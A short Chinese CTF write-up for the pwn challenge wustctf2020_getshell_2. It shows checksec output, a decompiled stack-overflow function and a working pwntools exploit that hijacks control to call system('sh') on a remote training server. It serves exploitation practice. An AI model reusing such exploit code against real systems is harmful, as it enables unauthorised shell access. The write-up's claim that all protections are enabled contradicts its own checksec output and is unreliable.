HugeH4rD

wustctf2020_getshell_2

Ubuntu 16.04

0x01

checksec

[*] '/home/zelas/Desktop/pwn/wustctf2020_getshell_2/wustctf2020_getshell_2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled			//
    PIE:      No PIE (0x8048000)

保护全开

IDA

vulnerable()

ssize_t vulnerable()
{
  char buf[24]; // [esp+0h] [ebp-18h] BYREF

  return read(0, buf, 0x24u);		//
}

可疑函数shell()

int shell()
{
  return system("/bbbbbbbbin_what_the_f?ck__--??/sh");		//参数直接用后面的sh
}

0x02

思路

可用字节只剩下0xc-0x4 = 8,用来填充system_plt,ret,sh.不够用

用call system 代替,call_system不需要ret,它会直接将下一个指令入栈

0x03

exp

from pwn import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 28730)
path = './wustctf2020_getshell_2'
# io = process([path])
# elf = ELF(path)
# libc = ELF('./libc-2.23.so')

padding = 0x18 + 0x4
sh = 0x8048670
call_system = 0x8048529
payload = flat(b'a'*padding, call_system, sh)
io.sendline(payload)
io.interactive()

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

wustctf2020_getshell_2

0x01

checksec

IDA

0x02

0x03

Zelas2Xerath